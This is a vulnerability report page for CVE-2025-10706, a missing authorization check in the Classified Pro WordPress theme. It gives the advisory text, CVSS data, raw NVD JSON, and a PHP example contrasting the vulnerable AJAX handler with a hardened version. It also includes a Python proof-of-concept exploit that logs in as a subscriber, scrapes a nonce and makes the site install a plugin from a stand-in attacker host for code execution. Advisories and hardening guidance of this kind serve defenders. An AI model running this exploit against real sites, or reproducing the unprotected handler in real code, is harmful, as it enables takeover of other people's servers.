Security Vulnerability Report
CVE-2025-10706 CVSS 8.8 HIGH

CVE-2025-10706

Published: 2025-10-16 07:15:32
Last Modified: 2026-04-15 00:35:42

Description

The Classified Pro theme for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check in the 'cwp_addons_update_plugin_cb' function in all versions up to, and including, 1.0.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins on the affected site's server which may make remote code execution possible. Note: The required nonce for the vulnerability is in the CubeWP Framework plugin.
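
The weakness behind this entry is CWE-862 (missing authorization): the AJAX callback verifies a nonce, which only proves the request was built from a page that embedded it, but never asks whether the caller is allowed to install plugins. The following is an added illustrative example, not code from the Classified Pro theme or the CubeWP Framework, which reconstructs that pattern and places the hardened handler beside it. The nonce action name 'cwp_addons_nonce', the POST field names and the allow-listed package host are assumptions made for illustration; 'cwp_addons_update_plugin_cb' and the install_plugins capability are the only names taken from the advisory and WordPress core respectively.

```php
<?php
/**
 * Added illustrative example (not the theme's or CubeWP's actual code).
 * Reconstructs the CWE-862 pattern from the advisory: an admin-ajax callback
 * with a nonce check but no capability check, next to a hardened version.
 * Assumptions: nonce action 'cwp_addons_nonce', field names '_wpnonce' and
 * 'plugin_url', and the allow-listed host used in the hardened handler.
 */

// --- Vulnerable pattern -----------------------------------------------------
// check_ajax_referer() is CSRF protection: it confirms the request carries a
// nonce that WordPress issued to *some* logged-in user for this action. A
// subscriber who can read that nonce from a page the CubeWP Framework plugin
// renders passes this check and reaches Plugin_Upgrader::install().
function cwp_addons_update_plugin_cb_vulnerable() {
    check_ajax_referer( 'cwp_addons_nonce', '_wpnonce' );

    $package = isset( $_POST['plugin_url'] ) ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) ) : '';

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $package ); // downloads and unzips an attacker-chosen URL

    wp_send_json( array( 'success' => ( true === $result ) ) );
}

// --- Hardened pattern -------------------------------------------------------
function cwp_addons_update_plugin_cb_hardened() {
    // 1. Authorization: the capability core itself requires for Plugins > Add New.
    //    map_meta_cap() maps install_plugins to do_not_allow when DISALLOW_FILE_MODS
    //    is set, so the site's file-modification policy is honoured as well.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'You are not allowed to install plugins.' ), 403 );
    }

    // 2. CSRF: the nonce, bound to this action and read from the field the client sends.
    check_ajax_referer( 'cwp_addons_nonce', '_wpnonce' );

    // 3. Input: never fetch an arbitrary URL. Restrict the package source to the
    //    host(s) the addon catalogue is expected to use (assumed list) over HTTPS.
    $allowed_hosts = array( 'downloads.wordpress.org' );
    $package       = isset( $_POST['plugin_url'] ) ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) ) : '';
    $scheme        = wp_parse_url( $package, PHP_URL_SCHEME );
    $host          = wp_parse_url( $package, PHP_URL_HOST );
    if ( 'https' !== $scheme || ! in_array( $host, $allowed_hosts, true ) ) {
        wp_send_json_error( array( 'message' => 'Package source not permitted.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $package );

    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }
    if ( true !== $result ) {
        wp_send_json_error( array( 'message' => 'Install failed.' ), 500 );
    }
    wp_send_json_success( array( 'installed' => true ) );
}

// Registering only wp_ajax_ (and not wp_ajax_nopriv_) limits the endpoint to
// logged-in users, which is exactly the population the advisory names as
// attackers. Authentication is not authorization; the capability check in
// step 1 is what actually closes the hole.
add_action( 'wp_ajax_cwp_addons_update_plugin_cb', 'cwp_addons_update_plugin_cb_hardened' );
```

The ordering in the hardened handler is deliberate: the capability check runs before anything else so that an unauthorized caller learns nothing about nonce validity or package handling, and the nonce check still stays in place because it addresses a different threat (a forged request riding on an administrator's session). The advisory's note that the nonce "is in the CubeWP Framework plugin" confirms that the nonce requirement existed; what was absent was step 1.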

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Classified Pro theme <= 1.0.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10706 PoC - Classified Pro unauthorized plugin installation
# Demonstrates how a subscriber-level user reaches the unprotected
# 'cwp_addons_update_plugin_cb' AJAX action. The admin page slug, the nonce
# field names and the POST parameter names below are this PoC's assumptions;
# the advisory only states that the required nonce lives in the CubeWP
# Framework plugin.
import re
import sys

import requests

# Target configuration
TARGET_URL = "https://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "user_password"

# Step 1: log in as the subscriber to obtain session cookies
session = requests.Session()
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1",
}
session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

# WordPress sets a wordpress_logged_in_* cookie on a successful login
if not any(c.name.startswith("wordpress_logged_in_") for c in session.cookies):
    sys.exit("[-] Login failed: no wordpress_logged_in cookie received")

# Step 2: obtain the nonce that the CubeWP Framework plugin embeds
# (page slug and nonce field names are assumptions of this PoC)
admin_page = session.get(f"{TARGET_URL}/wp-admin/admin.php?page=cubewp-framework")
nonce_match = re.search(r'_wpnonce["\s:=]+([a-f0-9]+)', admin_page.text)
if not nonce_match:
    # Alternative: a cubewp-specific nonce field in the same page
    nonce_match = re.search(r'cwp_addons_nonce["\s:=]+([a-f0-9]+)', admin_page.text)
# If neither pattern matches, replace the placeholder with a nonce extracted by hand
nonce = nonce_match.group(1) if nonce_match else "EXTRACTED_NONCE"

# Step 3: reach the missing capability check in cwp_addons_update_plugin_cb.
# This handler should require the install_plugins capability but does not.
malicious_plugin_url = "https://attacker.com/malicious-plugin.zip"
exploit_data = {
    "action": "cwp_addons_update_plugin_cb",
    "_wpnonce": nonce,
    "plugin_url": malicious_plugin_url,
    "plugin_slug": "malicious-plugin",
}

# Step 4: send the request to admin-ajax.php
response = session.post(f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data)

# The success check is heuristic: the handler's exact response format is not
# documented in the advisory.
if response.status_code == 200 and "success" in response.text.lower():
    print("[+] Plugin installation request accepted")
    print("[+] Code execution becomes possible once the malicious plugin's code is loaded")
else:
    print(f"[-] Exploit failed: {response.text}")
```

References

https://themeforest.net/item/classifiedpro-recommerce-classified-wordpress-theme/44528010
https://www.wordfence.com/threat-intel/vulnerabilities/id/2954583e-4ebe-4658-b132-0085f2b1cf08?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10706",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-10-16T07:15:32.270",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Classified Pro theme for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check in the 'cwp_addons_update_plugin_cb' function in all versions up to, and including, 1.0.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins on the affected site's server which may make remote code execution possible. Note: The required nonce for the vulnerability is in the CubeWP Framework plugin."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://themeforest.net/item/classifiedpro-recommerce-classified-wordpress-theme/44528010",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2954583e-4ebe-4658-b132-0085f2b1cf08?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}
```